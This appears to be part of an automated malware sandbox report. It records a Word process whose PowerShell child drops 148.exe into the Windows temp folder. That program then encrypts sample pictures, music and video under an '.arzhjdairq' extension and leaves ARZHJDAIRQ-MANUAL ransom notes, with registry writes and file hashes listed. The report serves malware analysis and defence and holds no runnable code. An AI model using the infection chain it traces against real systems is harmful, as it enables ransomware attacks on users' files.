HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
252
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
252
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
252
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3332
148.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3332
148.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
EnableFileTracing
0
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
EnableConsoleTracing
0
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
FileTracingMask
4294901760
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
ConsoleTracingMask
4294901760
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
MaxFileSize
1048576
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASAPI32
FileDirectory
%windir%\tracing
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
EnableFileTracing
0
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
EnableConsoleTracing
0
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
FileTracingMask
4294901760
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
ConsoleTracingMask
4294901760
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
MaxFileSize
1048576
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\148_RASMANCS
FileDirectory
%windir%\tracing
3332
148.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3332
148.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3332
148.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
DefaultConnectionSettings
4600000002000000090000000000000000000000000000000400000000000000F0F7F69FC020D501000000000000000000000000020000001700000000000000FE80000000000000A179B3FF019923140B00000000000000000065006E002D00550053000000000000000000000000000000000000000000000000000000000018000018F0A70C0050D99901E8331D000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8645300000000000000000F00000F8BA70C00F83B270048231D0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007000007E5A70C0088C19501609E1D0000000000000000000000000000000000000000002C0000000000000000000000
3332
148.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
WpadLastNetwork
3332
148.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81
Blob
0F000000010000001400000085FEF11B4F47FE3952F98301C9F98976FEFEE0CE09000000010000002A000000302806082B0601050507030106082B0601050507030206082B0601050507030406082B0601050507030353000000010000002500000030233021060B6086480186F8450107300130123010060A2B0601040182373C0101030200C01400000001000000140000007B5B45CFAFCECB7AFD31921A6AB6F346EB5748501D00000001000000100000005B3B67000EEB80022E42605B6B3B72400B000000010000000E000000740068006100770074006500000003000000010000001400000091C6D6EE3E8AC86384E548C299295C756C817B812000000001000000240400003082042030820308A0030201020210344ED55720D5EDEC49F42FCE37DB2B6D300D06092A864886F70D01010505003081A9310B300906035504061302555331153013060355040A130C7468617774652C20496E632E31283026060355040B131F43657274696669636174696F6E205365727669636573204469766973696F6E31383036060355040B132F2863292032303036207468617774652C20496E632E202D20466F7220617574686F72697A656420757365206F6E6C79311F301D06035504031316746861777465205072696D61727920526F6F74204341301E170D3036313131373030303030305A170D3336303731363233353935395A3081A9310B300906035504061302555331153013060355040A130C7468617774652C20496E632E31283026060355040B131F43657274696669636174696F6E205365727669636573204469766973696F6E31383036060355040B132F2863292032303036207468617774652C20496E632E202D20466F7220617574686F72697A656420757365206F6E6C79311F301D06035504031316746861777465205072696D61727920526F6F7420434130820122300D06092A864886F70D01010105000382010F003082010A0282010100ACA0F0FB8059D49CC7A4CF9DA159730910450C0D2C6E68F16C5B4868495937FC0B3319C2777FCC102D95341CE6EB4D09A71CD2B8C9973602B789D4245F06C0CC4494948D02626FEB5ADD118D289A5C8490107A0DBD74662F6A38A0E2D55444EB1D079F07BA6FEEE9FD4E0B29F53E84A001F19CABF81C7E89A4E8A1D871650DA3517BEEBCD222600DB95B9DDFBAFC515B0BAF98B2E92EE904E86287DE2BC8D74EC14C641EDDCF8758BA4A4FCA68071D1C9D4AC6D52F91CC7C71721CC5C067EB32FDC9925C94DA85C09BBF537D2B09F48C9D911F976A52CBDE0936A477D87B875044D53E6E2969FB3949261E09A5807B402DEBE82785C9FE61FD7EE67C971DD59D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E041604147B5B45CFAFCECB7AFD31921A6AB6F346EB574850300D06092A864886F70D010105050003820101007911C04BB391B6FCF0E967D40D6E45BE55E893D2CE033FEDDA25B01D57CB1E3A76A04CEC5076E864720CA4A9F1B88BD6D68784BB32E54111C077D9B3609DEB1BD5D16E4444A9A601EC55621D77B85C8E48497C9C3B5711ACAD73378E2F785C906847D96060E6FC073D222017C4F716E9C4D872F9C8737CDF162F15A93EFD6A27B6A1EB5ABA981FD5E34D640A9D13C861BAF5391C87BAB8BD7B227FF6FEAC4079E5AC106F3D8F1B79768BC437B3211884E53600EB632099B9E9FE3304BB41C8C102F94463209E81CE42D3D63F2C76D3639C59DD8FA6E10EA02E41F72E9547CFBCFD33F3F60B617E7E912B8147C22730EEA7105D378F5C392BE404F07B8D568C68
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510
3332
148.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81
Blob
190000000100000010000000DC73F9B71E16D51D26527D32B11A6A3D03000000010000001400000091C6D6EE3E8AC86384E548C299295C756C817B810B000000010000000E00000074006800610077007400650000001D00000001000000100000005B3B67000EEB80022E42605B6B3B72401400000001000000140000007B5B45CFAFCECB7AFD31921A6AB6F346EB57485053000000010000002500000030233021060B6086480186F8450107300130123010060A2B0601040182373C0101030200C009000000010000002A000000302806082B0601050507030106082B0601050507030206082B0601050507030406082B060105050703030F000000010000001400000085FEF11B4F47FE3952F98301C9F98976FEFEE0CE2000000001000000240400003082042030820308A0030201020210344ED55720D5EDEC49F42FCE37DB2B6D300D06092A864886F70D01010505003081A9310B300906035504061302555331153013060355040A130C7468617774652C20496E632E31283026060355040B131F43657274696669636174696F6E205365727669636573204469766973696F6E31383036060355040B132F2863292032303036207468617774652C20496E632E202D20466F7220617574686F72697A656420757365206F6E6C79311F301D06035504031316746861777465205072696D61727920526F6F74204341301E170D3036313131373030303030305A170D3336303731363233353935395A3081A9310B300906035504061302555331153013060355040A130C7468617774652C20496E632E31283026060355040B131F43657274696669636174696F6E205365727669636573204469766973696F6E31383036060355040B132F2863292032303036207468617774652C20496E632E202D20466F7220617574686F72697A656420757365206F6E6C79311F301D06035504031316746861777465205072696D61727920526F6F7420434130820122300D06092A864886F70D01010105000382010F003082010A0282010100ACA0F0FB8059D49CC7A4CF9DA159730910450C0D2C6E68F16C5B4868495937FC0B3319C2777FCC102D95341CE6EB4D09A71CD2B8C9973602B789D4245F06C0CC4494948D02626FEB5ADD118D289A5C8490107A0DBD74662F6A38A0E2D55444EB1D079F07BA6FEEE9FD4E0B29F53E84A001F19CABF81C7E89A4E8A1D871650DA3517BEEBCD222600DB95B9DDFBAFC515B0BAF98B2E92EE904E86287DE2BC8D74EC14C641EDDCF8758BA4A4FCA68071D1C9D4AC6D52F91CC7C71721CC5C067EB32FDC9925C94DA85C09BBF537D2B09F48C9D911F976A52CBDE0936A477D87B875044D53E6E2969FB3949261E09A5807B402DEBE82785C9FE61FD7EE67C971DD59D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E041604147B5B45CFAFCECB7AFD31921A6AB6F346EB574850300D06092A864886F70D010105050003820101007911C04BB391B6FCF0E967D40D6E45BE55E893D2CE033FEDDA25B01D57CB1E3A76A04CEC5076E864720CA4A9F1B88BD6D68784BB32E54111C077D9B3609DEB1BD5D16E4444A9A601EC55621D77B85C8E48497C9C3B5711ACAD73378E2F785C906847D96060E6FC073D222017C4F716E9C4D872F9C8737CDF162F15A93EFD6A27B6A1EB5ABA981FD5E34D640A9D13C861BAF5391C87BAB8BD7B227FF6FEAC4079E5AC106F3D8F1B79768BC437B3211884E53600EB632099B9E9FE3304BB41C8C102F94463209E81CE42D3D63F2C76D3639C59DD8FA6E10EA02E41F72E9547CFBCFD33F3F60B617E7E912B8147C22730EEA7105D378F5C392BE404F07B8D568C68

Files activity

Executable files
1
Suspicious files
428
Text files
317
Unknown types
17

Dropped files

PID
Process
Filename
Type
252
powershell.exe
C:\windows\temp\148.exe
executable
MD5: 6c68270003de296b724be2e6f0a60ede
SHA256: 4a11e2d1f4b71cba0ef8a3f7c4b85ad138f376264fc9c3efc6afe90a848ea26b
2716
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR3EC2.tmp.cvr
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Videos\Sample Videos\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.arzhjdairq
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.arzhjdairq
binary
MD5: 4b3918d8bc12242e0469d1b8aa4bd4f0
SHA256: 2c0f280b27cf1a2b42cb9a2c466efa00d11e8e45a801555b8653810f5658d4f5
3332
148.exe
C:\Users\Public\Recorded TV\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Recorded TV\Sample Media\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.arzhjdairq
binary
MD5: ea9d0bb401a47c357951c75989ab5501
SHA256: 86429e5d29d5b89f72e055ed7c5f80c23fc442f722623b4317b99aa639ccf511
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.arzhjdairq
binary
MD5: b0f7d9ab06bf5433bf2abb9b59cd9841
SHA256: 3ebaea61044242ecd853573effef283e0c88565a412a7610a2d1648a0e347e23
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.arzhjdairq
binary
MD5: 11c22c41cddb7bfd26234ca7e57c0b11
SHA256: cc17db248bf55ee20f9170c661d9fbaf5275d05da3bebb438dd6945ae11395c1
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.arzhjdairq
binary
MD5: d481b22009741c1bff4dac6b04e84ced
SHA256: 81a7d7b6d74c1c9b2621ab5d2cf9e6d7cd9ec3719ce72391b2a11b63e86ea2ae
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.arzhjdairq
binary
MD5: cd99b236adde188cec841a329fe7b866
SHA256: 0ae3f484f7e9b1ea25b9253d148c9643f5b22701552a7183717671269e568e9f
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.arzhjdairq
binary
MD5: a246e0ff28f1b1e8aacf7ff416ee596d
SHA256: 3ad06166e92fbce64c375df71189ee8fef508189828fc2ec356b3aa32a86d2b5
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.arzhjdairq
binary
MD5: bb806e260f24bdf4f394d63bd6198106
SHA256: f8bb59d848b4783010ec1f4399751b93c96ddca2b73ea7adcf3bbff716d45916
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\Sample Pictures\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.arzhjdairq
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.arzhjdairq
binary
MD5: 988334a679926c4da19fd9dd9d4381d1
SHA256: 918c3ffb8ab6478d6b9bb82f61abc8ccdcd541252f47661aa66d40b4f59d6e39
3332
148.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.arzhjdairq
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.arzhjdairq
binary
MD5: 88512df2f715c5c1b8d3948531fea8e4
SHA256: e14e20bd7b3a2ba779da463b35f410eb980de8c7dfbe79204e1b5a3960f9ad07
3332
148.exe
C:\Users\Public\Music\Sample Music\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Libraries\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Public\Pictures\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Favorites\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Videos\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Downloads\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Documents\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Music\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\Desktop\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Public\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\Saved Games\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ARZHJDAIRQ-MANUAL.txt
text
